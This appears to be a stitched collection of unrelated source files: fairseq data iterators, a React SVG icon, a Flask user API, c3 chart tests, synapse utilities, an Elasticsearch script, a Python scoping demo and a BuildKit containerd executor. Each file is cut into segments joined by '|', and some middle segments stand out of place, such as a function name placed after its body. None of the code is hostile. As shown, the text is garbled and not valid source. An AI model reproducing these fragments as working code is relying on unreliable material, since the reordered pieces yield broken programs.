self._next_epoch_itr = None
def _get_iterator_for_epoch(self, epoch, shuffle, fix_batches_to_gpus=False, offset=0):
def shuffle_batches(batches, seed):
with data_utils.numpy_seed(seed):
np.random.shuffle(batches)
return batches
if self._supports_prefetch:
batches = self.frozen_batches
if shuffle and not fix_batches_to_gpus:
batches = shuffle_batches(list(batches), self.seed + epoch)
batches = list(ShardedIterator(
batches, self.num_shards, self.shard_id, fill_value=[]
))
self.dataset.prefetch([i for s in batches for i in s])
if shuffle and fix_batches_to_gpus:
batches = shuffle_batches(batches, self.seed + epoch + self.shard_id)
else:
if shuffle:
batches = shuffle_batches(list(self.frozen_batches), self.seed + epoch)
else:
batches = self.frozen_batches
batches = list(ShardedIterator(
batches, self.num_shards, self.shard_id, fill_value=[]
))
if offset > 0 and offset >= len(batches):
return None
if self.num_workers > 0:
os.environ['PYTHONWARNINGS'] = 'ignore:semaphore_tracker:UserWarning'
# Create data loader
itr = torch.utils.data.DataLoader(
self.dataset,
collate_fn=self.collate_fn,
batch_sampler=batches[offset:],
num_workers=self.num_workers,
timeout=self.timeout,
)
# Wrap with a BufferedIterator if needed
if self.buffer_size > 0:
itr = BufferedIterator(self.buffer_size, itr)
|
class GroupedIterator(CountingIterator):
"""Wrapper around an iterable that returns groups (chunks) of items.
Args:
iterable (iterable): iterable to wrap
chunk_size (int): size of each chunk
Attributes:
n (int): number of elements consumed from this iterator
"""
def __init__(self, iterable, chunk_size):
itr = _chunk_iterator(iterable, chunk_size)
super().__init__(
itr,
start=int(math.ceil(getattr(iterable, 'n', 0) / float(chunk_size))),
total=int(math.ceil(len(iterable) / float(chunk_size))),
)
self.chunk_size = chunk_size
def _chunk_iterator(itr, chunk_size):
chunk = []
for x in itr:
chunk.append(x)
if len(chunk) == chunk_size:
yield chunk
chunk = []
if len(chunk) > 0:
yield chunk
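# Illustration (hedged, not from the original source): _chunk_iterator emits a
# trailing partial chunk rather than padding, so
#
#   list(_chunk_iterator(iter(range(5)), chunk_size=2))
#   # -> [[0, 1], [2, 3], [4]]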
class ShardedIterator(CountingIterator):
"""A sharded wrapper around an iterable, padded to length.
Args:
iterable (iterable): iterable to wrap
num_shards (int): number of shards to split the iterable into
shard_id (int): which shard to iterator over
fill_value (Any, optional): padding value when the iterable doesn't
evenly divide *num_shards* (default: None).
Attributes:
n (int): number of elements consumed from this iterator
"""
def __init__(self, iterable, num_shards, shard_id, fill_value=None):
if shard_id < 0 or shard_id >= num_shards:
raise ValueError('shard_id must be between 0 and num_shards')
sharded_len = int(math.ceil(len(iterable) / float(num_shards)))
batch_size = len(list(iterable)[0])
last = max(list(map(max, *list(iterable))))
# This function receives a list [1,2,3,...,last] where each number represents one of the input subsequences.
# In unmodified fairseq, if you have 4 GPUs, fairseq will give the first GPU subsequences [1,5,9,13,...],
# the second GPU will get [2,6,10,14,...], the third GPU will get [3,7,11,15,...], and so on.
# If we want to do caching, we can't use that: we need each GPU to get a continuous run of input subsequences (like [1,2,3,4,5,...]).
# So what the following code does is split the input into *continuous* chunks of subsequences. For example, with
# 4 GPUs and 100,000 input subsequences, the first GPU will get [1,2,3,...,25000], the second GPU will get [25001,25002,25003,...],
# and so on (see the sketch after this class).
# The description above assumes batch_size is 1, but the code also works when batch_size is greater than 1.
iterable = range(0, last)
all_itrs = []
for i in range(shard_id * batch_size, (shard_id + 1) * batch_size):
itr = list(itertools.islice(iterable, i * sharded_len, (i + 1) * sharded_len))
all_itrs.append(itr)
itr = [x for x in itertools.chain(*itertools.zip_longest(*all_itrs)) if x is not None]
itr = [itr[i:i + batch_size] for i in range(0, len(itr), batch_size)]  # split into batches
if len(itr) != sharded_len:  # makes sure that we don't miss any input subsequences
to_add = sharded_len - len(itr)
to_add = [[e] for e in range(sharded_len - to_add, sharded_len)]
itr = itr + to_add
super().__init__(
itr,
start=int(math.ceil(getattr(iterable, 'n', 0) / float(num_shards))),
total=sharded_len,
)
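# Sketch of the continuous split described in __init__ above (assuming
# batch_size == 1): with 8 subsequences and 2 shards, sharded_len == 4, so
#   shard 0 consumes batches [[0], [1], [2], [3]]
#   shard 1 consumes batches [[4], [5], [6], [7]]
# whereas round-robin sharding would have produced
#   shard 0 -> [0, 2, 4, 6] and shard 1 -> [1, 3, 5, 7]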
class BackgroundConsumer(Thread):
def __init__(self, queue, source, max_len):
Thread.__init__(self)
self._queue = queue
self._source = source
self._max_len = max_len
self.count = 0
def run(self):
try:
for item in self._source:
self._queue.put(item)
# Stop if we reached the maximum length
self.count += 1
if self._max_len is not None and self.count >= self._max_len:
break
# Signal the consumer we are done.
self._queue.put(_sentinel)
except Exception as e:
self._queue.put(e)
class BufferedIterator(object):
def __init__(self, size, iterable):
self._queue = queue.Queue(size)
self._iterable = iterable
self._consumer = None
self.start_time = time.time()
self.warning_time = None
self.total = len(iterable)
def _create_consumer(self):
self._consumer = BackgroundConsumer(
self._queue,
self._iterable,
self.total,
)
self._consumer.daemon = True
self._consumer.start()
def __iter__(self):
return self
def __len__(self):
return self.total
def take(self, n):
self.total = min(self.total, n)
# Propagate this change to the underlying iterator
if hasattr(self._iterable, "take"):
self._iterable.take(n)
else:
self._iterable = itertools.islice(self._iterable, n)
def __next__(self):
# Create consumer if not created yet
if self._consumer is None:
self._create_consumer()
# Notify the user if there is a data loading bottleneck
if self._queue.qsize() < min(2, max(1, self._queue.maxsize // 2)):
if time.time() - self.start_time > 5 * 60:
if self.warning_time is None or time.time() - self.warning_time > 15 * 60:
logger.debug(
"Data loading buffer is empty or nearly empty. This may "
"indicate a data loading bottleneck, and increasing the "
"number of workers (--num-workers) may help."
)
self.warning_time = time.time()
# Get next example
item = self._queue.get(True)
if isinstance(item, Exception):
raise item
if item is _sentinel:
raise StopIteration()
return item | # Wrap with CountingIterator
itr = CountingIterator(itr, start=offset)
return itr
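# Hedged usage sketch for BufferedIterator (defined above): a background
# thread prefetches up to `size` items into a bounded queue, then enqueues a
# sentinel that __next__ turns into StopIteration.
#
#   buf = BufferedIterator(size=2, iterable=list(range(5)))
#   print(list(buf))   # -> [0, 1, 2, 3, 4]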
|
ex1.py | print(callable(abs)) |
||
PersonPinRound.js | function SvgPersonPinRound(props) {
return (
<svg
xmlns='http://www.w3.org/2000/svg'
height='1em'
viewBox='0 0 24 24'
width='1em'
className='svg-icon'
{...props}> | </svg>
);
}
export default SvgPersonPinRound; | <path d='M0 0h24v24H0V0z' fill='none' />
<path d='M19 2H5a2 2 0 00-2 2v14c0 1.1.9 2 2 2h4l2.29 2.29c.39.39 1.02.39 1.41 0L15 20h4c1.1 0 2-.9 2-2V4c0-1.1-.9-2-2-2zm-7 3.3c1.49 0 2.7 1.21 2.7 2.7s-1.21 2.7-2.7 2.7S9.3 9.49 9.3 8s1.21-2.7 2.7-2.7zM18 16H6v-.9c0-2 4-3.1 6-3.1s6 1.1 6 3.1v.9z' /> |
users.py | from http import HTTPStatus
from typing import List
from apifairy import body, other_responses, response
from flask import Blueprint, jsonify
from flask import request
from src.config import DefaultConfig
from src.dtos.user import UserDto
from src.requests.user import CreateUserRequestSchema, CreateUserRequest, CreateManyUsersRequestSchema, \
CreateManyUsersRequest
from src.responses.user import UserResponseSchema
from src.services import queue_client
from src.services.pascal_to_snake_serializer import JSONSerializer as ToSnakeJson
from src.services.snake_to_pascal_serializer import JSONSerializer as ToPascalJson
users_api = Blueprint('users', __name__)
@users_api.route('users', methods=['POST'])
@other_responses({
200: 'User Created',
400: 'Request Body is Invalid'
})
@body(CreateUserRequestSchema())
def post(user_request: CreateUserRequest):
"""Create a User."""
if request.method == 'POST':
user_snake_case = ToSnakeJson.deserialize(UserDto, ToSnakeJson.serialize(user_request))
add_msg = queue_client.add_create_user_job(user_snake_case)
return jsonify(add_msg), 200
@users_api.route('users/many', methods=['POST'])
@other_responses({
200: 'Users Created',
400: 'Request Body is Invalid'
})
@body(CreateManyUsersRequestSchema())
def | (user_request: CreateManyUsersRequest):
"""Create a User."""
if request.method == 'POST':
users_snake_case = ToSnakeJson.deserialize(List[UserDto], ToSnakeJson.serialize(user_request.Users))
users_added = []
for user in users_snake_case:
add_msg = queue_client.add_create_user_job(user)
users_added.append(add_msg)
return jsonify(users_added), 200
@users_api.route('users/<int:id>', methods=['GET'])
@response(UserResponseSchema, HTTPStatus.OK.value, "Get Users")
def get_all_users(id: int):
if request.method == 'GET':
user = UserDto(user_name=DefaultConfig.DEFAULT_USERNAME)
return ToPascalJson.serialize(user), 200
| post_many |
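# Hedged wiring sketch (the Flask app factory lives outside this file); the
# route rules above have no leading slash, so a url_prefix ending in '/' is
# assumed when registering the blueprint:
#
#   from flask import Flask
#   app = Flask(__name__)
#   app.register_blueprint(users_api, url_prefix='/api/')
#   # POST /api/users, POST /api/users/many, GET /api/users/<id>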
api.data-spec.ts | import { d3, initChart } from './c3-helper'
describe('c3 api data', function() {
'use strict'
var chart
var args: any = {
data: {
columns: [
['data1', 30, 200, 100, 400, 150, 250],
['data2', 5000, 2000, 1000, 4000, 1500, 2500]
],
names: {
data1: 'Data Name 1',
data2: 'Data Name 2'
},
colors: {
data1: '#FF0000',
data2: '#00FF00'
},
axes: {
data1: 'y',
data2: 'y2'
}
},
axis: {
y2: {
show: true
}
}
}
beforeEach(function(done) {
jasmine.addMatchers(customMatchers as any)
chart = initChart(chart, args, done)
})
describe('data()', function() {
it('should return all of data if no argument given', function() {
var results = chart.data(),
expected = ['data1', 'data2']
results.forEach(function(result, i) {
expect(result.id).toBe(expected[i])
})
})
it('should return specified data if string argument given', function() {
var results = chart.data('data1')
expect(results.length).toBe(1)
expect(results[0].id).toBe('data1')
})
it('should return specified data if array argument given', function() {
var results = chart.data(['data1', 'data2'])
expect(results.length).toBe(2)
expect(results[0].id).toBe('data1')
expect(results[1].id).toBe('data2')
})
})
describe('data.shown()', function() {
it('should return only shown targets', function() {
var results
chart.hide('data1')
results = chart.data.shown()
expect(results.length).toBe(1)
expect(results[0].id).toBe('data2')
})
})
describe('data.values()', function() {
it('should return values for specified target', function() {
var values = chart.data.values('data1'),
expectedValues = [30, 200, 100, 400, 150, 250]
expect(values.length).toBe(6)
values.forEach(function(v, i) {
expect(v).toBe(expectedValues[i])
})
})
it('should return null when no args', function() {
var values = chart.data.values()
expect(values).toBeNull() | })
})
describe('data.names()', function() {
it('should return data.names specified as argument', function() {
var results = chart.data.names()
expect(results.data1).toBe('Data Name 1')
expect(results.data2).toBe('Data Name 2')
})
it('should return data.names specified as api', function() {
var results = chart.data.names({
data1: 'New Data Name 1',
data2: 'New Data Name 2'
})
expect(results.data1).toBe('New Data Name 1')
expect(results.data2).toBe('New Data Name 2')
})
it('should set data.names specified as api', function() {
expect(d3.select('.c3-legend-item-data1 text').text()).toBe(
'New Data Name 1'
)
expect(d3.select('.c3-legend-item-data2 text').text()).toBe(
'New Data Name 2'
)
})
})
describe('data.colors()', function() {
it('should return data.colors specified as argument', function() {
var results = chart.data.colors()
;(expect(results.data1) as any).toBeHexOrRGB('#FF0000')
;(expect(results.data2) as any).toBeHexOrRGB('#00FF00')
})
it('should return data.colors specified as api', function() {
var results = chart.data.colors({
data1: '#00FF00',
data2: '#FF0000'
})
;(expect(results.data1) as any).toBeHexOrRGB('#00FF00')
;(expect(results.data2) as any).toBeHexOrRGB('#FF0000')
})
it('should set data.colors specified as api', function() {
;(expect(
d3.select('.c3-line-data1').style('stroke')
) as any).toBeHexOrRGB('#00ff00')
;(expect(
d3.select('.c3-line-data2').style('stroke')
) as any).toBeHexOrRGB('#ff0000')
;(expect(
d3.select('.c3-legend-item-data1 .c3-legend-item-tile').style('stroke')
) as any).toBeHexOrRGB('#00ff00')
;(expect(
d3.select('.c3-legend-item-data2 .c3-legend-item-tile').style('stroke')
) as any).toBeHexOrRGB('#ff0000')
})
})
describe('data.axes()', function() {
it('should return data.axes specified as argument', function() {
var results = chart.data.axes()
expect(results.data1).toBe('y')
expect(results.data2).toBe('y2')
expect(d3.select('.c3-axis-y g.tick text').text()).toBe('0')
expect(d3.select('.c3-axis-y2 g.tick text').text()).toBe('1000')
})
it('should return data.axes specified as api', function() {
var results = chart.data.axes({
data1: 'y2',
data2: 'y'
})
expect(results.data1).toBe('y2')
expect(results.data2).toBe('y')
expect(d3.select('.c3-axis-y g.tick text').text()).toBe('1000')
expect(d3.select('.c3-axis-y2 g.tick text').text()).toBe('0')
})
})
describe('data.stackNormalized()', function() {
beforeEach(function(done) {
args = {
data: {
columns: [
['data1', 30, 200, 100, 400, 150, 250],
['data2', 500, 850, 1000, 200, 350, 100]
],
groups: [['data1', 'data2']],
stack: {
normalize: true
}
}
}
chart = initChart(chart, args, done)
})
it('can toggle option', function(done) {
expect(chart.data.stackNormalized()).toBe(true)
expect(chart.internal.y.domain()).toEqual([0, 100])
chart.data.stackNormalized(false)
setTimeout(function() {
expect(chart.data.stackNormalized()).toBe(false)
expect(chart.internal.y.domain()).toEqual([0, 1200])
done()
}, 100)
})
})
})
describe('c3 api data.x', function() {
'use strict'
var chart
var args = {
data: {
x: 'x',
columns: [
['x', 10, 30, 45, 50, 70, 100],
['data1', 30, 200, 100, 400, 150, 250],
['data2', 20, 180, 240, 100, 190]
]
}
}
beforeEach(function(done) {
chart = initChart(chart, args, done)
})
it('should return values for target data1', function() {
var values = chart.data.values('data1'),
expectedValues = [30, 200, 100, 400, 150, 250]
expect(values.length).toBe(6)
values.forEach(function(v, i) {
expect(v).toBe(expectedValues[i])
})
})
it('should return null when no args', function() {
var values = chart.data.values()
expect(values).toBeNull()
})
it('should return data values for data if string argument given', function() {
var results = chart.data('data1')
expect(results.length).toBe(1)
expect(results[0].id).toBe('data1')
})
it('should return specified data if array argument given', function() {
var results = chart.data(['data1', 'data2'])
expect(results.length).toBe(2)
expect(results[0].id).toBe('data1')
expect(results[1].id).toBe('data2')
})
})
describe('c3 api data.xs', function() {
'use strict'
var chart
var args = {
data: {
xs: {
data1: 'x1',
data2: 'x2'
},
columns: [
['x1', 10, 30, 45, 50, 70, 100],
['x2', 30, 50, 75, 100, 120],
['data1', 30, 200, 100, 400, 150, 250],
['data2', 20, 180, 240, 100, 190]
]
}
}
beforeEach(function(done) {
chart = initChart(chart, args, done)
})
it('should return values for target data1', function() {
var values = chart.data.values('data1'),
expectedValues = [30, 200, 100, 400, 150, 250]
expect(values.length).toBe(6)
values.forEach(function(v, i) {
expect(v).toBe(expectedValues[i])
})
})
it('should return null when no args', function() {
var values = chart.data.values()
expect(values).toBeNull()
})
it('should return data values for data if string argument given', function() {
var results = chart.data('data1')
expect(results.length).toBe(1)
expect(results[0].id).toBe('data1')
})
it('should return specified data if array argument given', function() {
var results = chart.data(['data1', 'data2'])
expect(results.length).toBe(2)
expect(results[0].id).toBe('data1')
expect(results[1].id).toBe('data2')
})
})
var customMatchers = {
toBeHexOrRGB: function(util, customEqualityTesters) {
'use strict'
function rgb2hex(rgb) {
rgb = rgb.match(
/^rgba?[\s+]?\([\s+]?(\d+)[\s+]?,[\s+]?(\d+)[\s+]?,[\s+]?(\d+)[\s+]?/i
)
return rgb && rgb.length === 4
? '#' +
('0' + parseInt(rgb[1], 10).toString(16)).slice(-2) +
('0' + parseInt(rgb[2], 10).toString(16)).slice(-2) +
('0' + parseInt(rgb[3], 10).toString(16)).slice(-2)
: ''
}
return {
compare: function(actual, expected) {
if (expected === undefined) {
expected = ''
}
var result: any = {}
actual = actual.match('rgb') ? rgb2hex(actual) : actual
expected = expected.match('rgb') ? rgb2hex(expected) : expected
result.pass = util.equals(actual, expected, customEqualityTesters)
if (result.pass) {
result.message = 'Expected ' + actual + ' not to be quite so goofy'
} else {
result.message =
'Expected ' + actual + ' to be goofy, but it was not very goofy'
}
return result
}
}
}
} | |
synapse_util.py | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for synapse handling."""
import enum
import functools as ft
from typing import Callable, List, Sequence, Text, Union, Optional
import dataclasses as dc
import jax.numpy as jp
import numpy as np
import tensorflow.compat.v1 as tf
from blur import blur_env
TensorShape = tf.TensorShape
Tensor = Union[tf.Tensor, np.ndarray, jp.array]
@dc.dataclass
class SynapseInitializerParams:
shape: TensorShape
in_neurons: int
out_neurons: int
class UpdateType(enum.Enum):
FORWARD = 1
BACKWARD = 2
BOTH = 3
NONE = 4
SynapseInitializer = Callable[[SynapseInitializerParams], Tensor]
# A callable that takes a sequence of layers and SynapseInitializer and creates
# appropriately shaped list of Synapses.
CreateSynapseFn = Callable[[Sequence[Tensor], SynapseInitializer], List[Tensor]]
def random_uniform_symmetric(shape, seed):
return (tf.random.uniform(shape, seed=seed) - 0.5) * 2
def random_initializer(start_seed=0, scale_by_channels=False,
scale=1, bias=0, random_fn=random_uniform_symmetric):
"""Returns initializer that generates random sequence."""
seed = [hash(str(start_seed))]
def impl(params):
if len(params.shape) >= 3:
# shape: species x (in+out) x (in+out) x states
num_channels = int(params.shape[-2])
seed[0] += 1
v = random_fn(params.shape, seed[0])
apply_scale = scale(params) if callable(scale) else scale
r = v * apply_scale + bias
if scale_by_channels:
r = r / (num_channels ** 0.5)
return r
return impl
def _random_uniform_fn(start_seed):
rng = np.random.RandomState(start_seed)
return lambda shape: tf.constant(rng.uniform( # pylint: disable=g-long-lambda
low=-1, high=1, size=shape), dtype=np.float32)
def fixed_random_initializer(start_seed=0,
scale_by_channels=False,
scale=1,
bias=0,
random_fn=None):
"""Returns an initializer that generates random (but fixed) sequence.
The resulting tensors are backed by a constant so they produce the same
value across all calls.
This initializer uses its own random state that is independent of default
random sequence.
Args:
start_seed: initial seed passed to np.random.RandomState
scale_by_channels: whether to scale by number of channels.
scale: target scale (default: 1)
bias: mean of the resulting distribution.
random_fn: random generator; if None, _random_uniform_fn is used.
Returns:
callable that accepts SynapseInitializerParams and returns a tensorflow
constant tensor (see the usage sketch after this function).
"""
if random_fn is None:
random_fn = _random_uniform_fn(start_seed)
def impl(params):
if len(params.shape) >= 3:
# shape: species x (in+out) x (in+out) x states
num_channels = int(params.shape[-2])
v = random_fn(shape=params.shape)
apply_scale = scale(params) if callable(scale) else scale
r = v * apply_scale + bias
if scale_by_channels:
r = r / (num_channels ** 0.5)
return r
return impl
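# Hedged usage sketch: for a given start_seed the initializer yields the same
# constant tensor on every call; shapes follow SynapseInitializerParams above.
#
#   init = fixed_random_initializer(start_seed=7, scale=0.1)
#   params = SynapseInitializerParams(shape=(4, 4, 1), in_neurons=2, out_neurons=1)
#   synapse = init(params)   # tf constant, shape (4, 4, 1), values in [-0.1, 0.1]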
def create_synapse_init_fns(
layers,
initializer):
"""Generates network synapse initializers.
Arguments:
layers: Sequence of network layers (used for shape calculation).
initializer: SynapseInitializer used to initialize synapse tensors.
Returns:
A list of functions that produce synapse tensors for all layers upon
execution.
"""
synapse_init_fns = []
for pre, post in zip(layers, layers[1:]):
# shape: population_dims, batch_size, in_channels, neuron_state
pop_dims = pre.shape[:-3]
# -2: is the number of channels
num_inputs = pre.shape[-2] + post.shape[-2] + 1
# -1: is the number of states in a single neuron.
synapse_shape = (*pop_dims, num_inputs, num_inputs, pre.shape[-1])
params = SynapseInitializerParams(
shape=synapse_shape,
in_neurons=pre.shape[-2],
out_neurons=post.shape[-2])
synapse_init_fns.append(ft.partial(initializer, params))
return synapse_init_fns
def create_synapses(layers,
initializer):
"""Generates arbitrary form synapses.
Arguments:
layers: Sequence of network layers (used for shape calculation).
initializer: SynapseInitializer used to initialize synapse tensors.
Returns:
A list of created synapse tensors for all layers.
"""
return [init_fn() for init_fn in create_synapse_init_fns(layers, initializer)]
def transpose_synapse(synapse, env):
num_batch_dims = len(synapse.shape[:-3])
perm = [
*range(num_batch_dims), num_batch_dims + 1, num_batch_dims,
num_batch_dims + 2
]
return env.transpose(synapse, perm)
def synapse_submatrix(synapse,
in_channels,
update_type,
include_bias = True):
"""Returns a submatrix of a synapse matrix given the update type."""
bias = 1 if include_bias else 0
if update_type == UpdateType.FORWARD:
return synapse[Ellipsis, :(in_channels + bias), (in_channels + bias):, :]
if update_type == UpdateType.BACKWARD:
return synapse[Ellipsis, (in_channels + bias):, :(in_channels + bias), :]
def combine_in_out_synapses(in_out_synapse, out_in_synapse,
env):
"""Combines forward and backward synapses into a single matrix."""
batch_dims = in_out_synapse.shape[:-3]
out_channels, in_channels, num_states = in_out_synapse.shape[-3:]
synapse = env.concat([
env.concat([
env.zeros((*batch_dims, out_channels, out_channels, num_states)),
in_out_synapse
], axis=-2),
env.concat([
out_in_synapse,
env.zeros((*batch_dims, in_channels, in_channels, num_states))
], axis=-2)
], axis=-3)
return synapse
def sync_all_synapses(synapses, layers, env):
"""Sync synapses across all layers.
For each synapse, syncs its first-state forward synapse with the backward
synapse and copies it across all the states.
Args:
synapses: list of synapses in the network.
layers: list of layers in the network.
env: Environment
Returns:
Synchronized synapses.
"""
for i in range(len(synapses)):
synapses[i] = sync_in_and_out_synapse(synapses[i], layers[i].shape[-2], env)
return synapses
def sync_in_and_out_synapse(synapse, in_channels, env):
"""Copies forward synapse to backward one."""
in_out_synapse = synapse_submatrix(
synapse,
in_channels=in_channels,
update_type=UpdateType.FORWARD,
include_bias=True)
return combine_in_out_synapses(
in_out_synapse,
transpose_synapse(in_out_synapse, env),
env)
def sync_states_synapse(synapse, env, num_states=None):
|
def normalize_synapses(synapses,
rescale_to,
env,
axis = -3):
"""Normalizes synapses across a particular axis (across input by def.)."""
# Default value axis=-3 corresponds to normalizing across the input neuron
# dimension.
squared = env.sum(synapses ** 2, axis=axis, keepdims=True)
synapses /= env.sqrt(squared + 1e-9)
if rescale_to is not None:
synapses *= rescale_to
return synapses
| """Sync synapse's first state across all the other states."""
if num_states is None:
num_states = synapse.shape[-1]
return env.stack(num_states*[synapse[Ellipsis, 0]], axis=-1) |
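# Numpy-only sketch (illustrative; the real code routes concat/zeros through
# `env`) of the block matrix combine_in_out_synapses assembles:
#
#   import numpy as np
#   fwd = np.ones((2, 3, 1))                                    # (out, in, states)
#   bwd = np.ones((3, 2, 1))                                    # (in, out, states)
#   top = np.concatenate([np.zeros((2, 2, 1)), fwd], axis=-2)   # [0   | fwd]
#   bot = np.concatenate([bwd, np.zeros((3, 3, 1))], axis=-2)   # [bwd | 0  ]
#   full = np.concatenate([top, bot], axis=-3)                  # shape (5, 5, 1)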
search.py | from elasticsearch import Elasticsearch
from pprint import pprint as pp
es = Elasticsearch()
INDEX = "meme-index"
TYPE = "meme"
def submit(id, doc):
res = es.index(index=INDEX, doc_type=TYPE, id=id, body=doc)
if res['created']:
return True
def search(query):
es.indices.refresh(index=INDEX)
res = es.search(index=INDEX, body={
"query": {
"fuzzy_like_this": {
"fields": ["title"],
"like_text": query,
"max_query_terms": 12
}
}
})
print("Query: %s -> Got %d Hits:" % (query, res['hits']['total']))
return res['hits']['hits']
def get(id):
"""
:param id: the exact match of the id (the url)
:return: dict
"""""
return es.get(index=INDEX, doc_type=TYPE, id=id)
if __name__ == '__main__':
#es.indices.delete(index=INDEX)
#submit("http://www.google.com/", { | #res = search("how")
res = get('http://knowyourmeme.com/memes/pancake-bunny')
pp(res)
#res = search("hi") | # 'title': "hello world",
# 'body': "body ",
# 'img': 'url'
#}) |
var_global_local.py | global_var = 10
def function_example(local_var_1, local_var_2):
print(local_var_1, local_var_2, global_var)
function_example(11, 12)
def function_example_1(local_var_1, local_var_2):
global global_var
global_var = 20
print(local_var_1, local_var_2, global_var, id(global_var))
function_example_1(11, 12)
print(global_var, id(global_var))
# nonlocal
def counter():
num = 0
def plus_one():
nonlocal num
num += 1
return num
return plus_one
count = counter()
print(count) | print(count())
print(count()) | |
executor.go | package containerdexecutor
import (
"context"
"io"
"io/ioutil"
"os"
"path/filepath"
"sync"
"syscall"
"time"
"github.com/moby/buildkit/util/bklog"
"github.com/containerd/containerd"
"github.com/containerd/containerd/cio"
"github.com/containerd/containerd/mount"
containerdoci "github.com/containerd/containerd/oci"
"github.com/containerd/continuity/fs"
"github.com/docker/docker/pkg/idtools"
"github.com/moby/buildkit/executor"
"github.com/moby/buildkit/executor/oci"
gatewayapi "github.com/moby/buildkit/frontend/gateway/pb"
"github.com/moby/buildkit/identity"
"github.com/moby/buildkit/snapshot"
"github.com/moby/buildkit/solver/pb"
"github.com/moby/buildkit/util/network"
"github.com/opencontainers/runtime-spec/specs-go"
"github.com/pkg/errors"
)
type containerdExecutor struct {
client *containerd.Client
root string
networkProviders map[pb.NetMode]network.Provider
cgroupParent string
dnsConfig *oci.DNSConfig
running map[string]chan error
mu sync.Mutex
apparmorProfile string
traceSocket string
}
// New creates a new executor backed by connection to containerd API
func New(client *containerd.Client, root, cgroup string, networkProviders map[pb.NetMode]network.Provider, dnsConfig *oci.DNSConfig, apparmorProfile string, traceSocket string) executor.Executor { | // clean up old hosts/resolv.conf file. ignore errors
os.RemoveAll(filepath.Join(root, "hosts"))
os.RemoveAll(filepath.Join(root, "resolv.conf"))
return &containerdExecutor{
client: client,
root: root,
networkProviders: networkProviders,
cgroupParent: cgroup,
dnsConfig: dnsConfig,
running: make(map[string]chan error),
apparmorProfile: apparmorProfile,
traceSocket: traceSocket,
}
}
func (w *containerdExecutor) Run(ctx context.Context, id string, root executor.Mount, mounts []executor.Mount, process executor.ProcessInfo, started chan<- struct{}) (err error) {
if id == "" {
id = identity.NewID()
}
startedOnce := sync.Once{}
done := make(chan error, 1)
w.mu.Lock()
w.running[id] = done
w.mu.Unlock()
defer func() {
w.mu.Lock()
delete(w.running, id)
w.mu.Unlock()
done <- err
close(done)
if started != nil {
startedOnce.Do(func() {
close(started)
})
}
}()
meta := process.Meta
resolvConf, err := oci.GetResolvConf(ctx, w.root, nil, w.dnsConfig)
if err != nil {
return err
}
hostsFile, clean, err := oci.GetHostsFile(ctx, w.root, meta.ExtraHosts, nil, meta.Hostname)
if err != nil {
return err
}
if clean != nil {
defer clean()
}
mountable, err := root.Src.Mount(ctx, false)
if err != nil {
return err
}
rootMounts, release, err := mountable.Mount()
if err != nil {
return err
}
if release != nil {
defer release()
}
lm := snapshot.LocalMounterWithMounts(rootMounts)
rootfsPath, err := lm.Mount()
if err != nil {
return err
}
defer lm.Unmount()
defer executor.MountStubsCleaner(rootfsPath, mounts)()
var sgids []uint32
uid, gid, err := oci.ParseUIDGID(meta.User)
if err != nil {
uid, gid, sgids, err = oci.GetUser(rootfsPath, meta.User)
if err != nil {
return err
}
identity := idtools.Identity{
UID: int(uid),
GID: int(gid),
}
newp, err := fs.RootPath(rootfsPath, meta.Cwd)
if err != nil {
return errors.Wrapf(err, "working dir %s points to invalid target", newp)
}
if _, err := os.Stat(newp); err != nil {
if err := idtools.MkdirAllAndChown(newp, 0755, identity); err != nil {
return errors.Wrapf(err, "failed to create working directory %s", newp)
}
}
}
provider, ok := w.networkProviders[meta.NetMode]
if !ok {
return errors.Errorf("unknown network mode %s", meta.NetMode)
}
namespace, err := provider.New()
if err != nil {
return err
}
defer namespace.Close()
if meta.NetMode == pb.NetMode_HOST {
bklog.G(ctx).Info("enabling HostNetworking")
}
opts := []containerdoci.SpecOpts{oci.WithUIDGID(uid, gid, sgids)}
if meta.ReadonlyRootFS {
opts = append(opts, containerdoci.WithRootFSReadonly())
}
processMode := oci.ProcessSandbox // FIXME(AkihiroSuda)
spec, cleanup, err := oci.GenerateSpec(ctx, meta, mounts, id, resolvConf, hostsFile, namespace, w.cgroupParent, processMode, nil, w.apparmorProfile, w.traceSocket, opts...)
if err != nil {
return err
}
defer cleanup()
spec.Process.Terminal = meta.Tty
container, err := w.client.NewContainer(ctx, id,
containerd.WithSpec(spec),
)
if err != nil {
return err
}
defer func() {
if err1 := container.Delete(context.TODO()); err == nil && err1 != nil {
err = errors.Wrapf(err1, "failed to delete container %s", id)
}
}()
fixProcessOutput(&process)
cioOpts := []cio.Opt{cio.WithStreams(process.Stdin, process.Stdout, process.Stderr)}
if meta.Tty {
cioOpts = append(cioOpts, cio.WithTerminal)
}
task, err := container.NewTask(ctx, cio.NewCreator(cioOpts...), containerd.WithRootFS([]mount.Mount{{
Source: rootfsPath,
Type: "bind",
Options: []string{"rbind"},
}}))
if err != nil {
return err
}
defer func() {
if _, err1 := task.Delete(context.TODO()); err == nil && err1 != nil {
err = errors.Wrapf(err1, "failed to delete task %s", id)
}
}()
err = w.runProcess(ctx, task, process.Resize, func() {
startedOnce.Do(func() {
if started != nil {
close(started)
}
})
})
return err
}
func (w *containerdExecutor) Exec(ctx context.Context, id string, process executor.ProcessInfo) (err error) {
meta := process.Meta
// first verify the container is running, if we get an error assume the container
// is in the process of being created and check again every 100ms or until
// context is canceled.
var container containerd.Container
var task containerd.Task
for {
w.mu.Lock()
done, ok := w.running[id]
w.mu.Unlock()
if !ok {
return errors.Errorf("container %s not found", id)
}
if container == nil {
container, _ = w.client.LoadContainer(ctx, id)
}
if container != nil && task == nil {
task, _ = container.Task(ctx, nil)
}
if task != nil {
status, _ := task.Status(ctx)
if status.Status == containerd.Running {
break
}
}
select {
case <-ctx.Done():
return ctx.Err()
case err, ok := <-done:
if !ok || err == nil {
return errors.Errorf("container %s has stopped", id)
}
return errors.Wrapf(err, "container %s has exited with error", id)
case <-time.After(100 * time.Millisecond):
continue
}
}
spec, err := container.Spec(ctx)
if err != nil {
return errors.WithStack(err)
}
proc := spec.Process
// TODO how do we get rootfsPath for oci.GetUser in case user passed in username rather than uid:gid?
// For now only support uid:gid
if meta.User != "" {
uid, gid, err := oci.ParseUIDGID(meta.User)
if err != nil {
return errors.WithStack(err)
